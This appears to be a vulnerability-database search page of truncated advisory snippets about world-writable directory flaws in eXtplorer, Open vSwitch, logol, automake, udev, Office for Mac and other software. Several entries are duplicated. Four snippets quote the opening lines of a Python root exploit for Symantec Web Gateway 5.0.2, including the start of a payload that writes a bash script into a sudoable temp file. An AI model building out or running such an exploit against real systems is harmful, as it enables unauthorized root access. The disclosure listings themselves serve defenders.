UBUNTU-CVE-2012-3454

eXtplorer 2.1.0b6 uses world writable permissions for the /var/lib/extplorer/ftptmp directory, which allows local users to delete or overwrite arbitrary files...

CVE-2012-3449

Open vSwitch 1.4.2 uses world writable permissions for 1 /var/lib/openvswitch/pki/controllerca/incoming/ and 2 /var/lib/openvswitch/pki/switchca/incoming/, which allows local users to delete and overwrite arbitrary files...

CVE-2012-3454

eXtplorer 2.1.0b6 uses world writable permissions for the /var/lib/extplorer/ftptmp directory, which allows local users to delete or overwrite arbitrary files...

CVE-2012-3453

logol 1.5.0 uses world writable permissions for the /var/lib/logol/results directory, which allows local users to delete or overwrite arbitrary files...

CVE-2012-3449

Open vSwitch 1.4.2 uses world writable permissions for 1 /var/lib/openvswitch/pki/controllerca/incoming/ and 2 /var/lib/openvswitch/pki/switchca/incoming/, which allows local users to delete and overwrite arbitrary files...

CVE-2012-3453

logol 1.5.0 uses world writable permissions for the /var/lib/logol/results directory, which allows local users to delete or overwrite arbitrary files...

CVE-2012-3453

CVE-2012-3453 affects logol 1.5.0, where the /var/lib/logol/results directory uses world-writable permissions, enabling local users to delete or overwrite arbitrary files. The root cause is insecure directory permissions. No explicit exploit details or active exploitation are provided in the conn...

FreeBSD : automake -- Insecure 'distcheck' recipe granted world-writable distdir (10f38033-e006-11e1-9304-000000000000)

GNU reports : The recipe of the 'distcheck' target granted temporary world-write permissions on the extracted distdir. This introduced a locally exploitable race condition for those who run 'make distcheck' with a non-restrictive umask e.g., 022 in a directory that was accessible by others. A...

Scientific Linux Security Update : sblim on SL4.x, SL5.x i386/x86_64

It was discovered that certain sblim libraries had an RPATH runtime library search path set in the ELF Executable and Linking Format header. This RPATH pointed to a sub-directory of a world-writable, temporary directory. A local user could create a file with the same name as a library required by...

Scientific Linux Security Update : automake on SL5.x i386/x86_64

Automake-generated Makefiles made certain directories world-writable when preparing source archives, as was recommended by the GNU Coding Standards. If a malicious, local user could access the directory where a victim was creating distribution archives, they could use this flaw to modify the file...

Scientific Linux Security Update : udev on SL5.x i386/x86_64

It was discovered that udev did not properly check the origin of Netlink messages. A local attacker could use this flaw to gain root privileges via a crafted Netlink message sent to udev, causing it to create a world-writable block device file for an existing system block device for example, the...

Scientific Linux Security Update : rsync on SL5.x i386/x86_64

rsync is a program for synchronizing files over a network. A flaw was found in the way the rsync daemon handled the 'filter', 'exclude', and 'exclude from' options, used for hiding files and preventing access to them from rsync clients. A remote attacker could use this flaw to bypass those...

Design/Logic Flaw

Microsoft Office for Mac 2011 uses world-writable permissions for the "Applications/Microsoft Office 2011/" directory and certain other directories, which allows local users to gain privileges by placing a Trojan horse executable file in one of these directories, aka "Office for Mac Improper Fold...

automake -- Insecure 'distcheck' recipe granted world-writable distdir

GNU reports: The recipe of the 'distcheck' target granted temporary world-write permissions on the extracted distdir. This introduced a locally exploitable race condition for those who run "make distcheck" with a non-restrictive umask e.g., 022 in a directory that was accessible by others. A...

The star outside the mention of the right new ideas&the star outside security Bulletin(mention the right vulnerability)-vulnerability warning-the black bar safety net

Statement, This is not what a star outside 0DAY, which at Best, only one in could not find a writable executable directory of a mention of the right ideas. I dare not say that I first found, there may be other people also found, and also in the use. In fact, numerous examples demonstrate that the...

Symantec Web Gateway 5.0.2 Local File Inclusion

!/usr/bin/python Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. muts at offensive-security dot com import socket import base64 payload= '''echo '!/bin/bash' /tmp/networkScript; echo 'bash ...

Symantec Web Gateway 5.0.2 - LocalRemote File Inclusion Remote Code Execution

Symantec Web Gateway 5.0.2 - LocalRemote File Inclusion Remote Code Execution !/usr/bin/python Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. muts at offensive-security dot com import sock...

Symantec Web Gateway 5.0.2 Remote LFI Root Exploit

Exploit for linux platform in category remote exploits !/usr/bin/python Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. muts at offensive-security dot com import socket import base64 payloa...

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution

!/usr/bin/python Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. muts at offensive-security dot com import socket import base64 payload= '''echo '!/bin/bash' /tmp/networkScript; echo 'bash ...

SuSE 10 Security Update : the Linux Kernel (x86_64) (ZYPP Patch Number 6730)

This update fixes a several security issues and various bugs in the SUSE Linux Enterprise 10 SP 2 kernel. The following security issues were fixed: CVE-2009-3939: A sysctl variable of the megaraidsas driver was worldwriteable, allowing local users to cause a denial of service or potential code...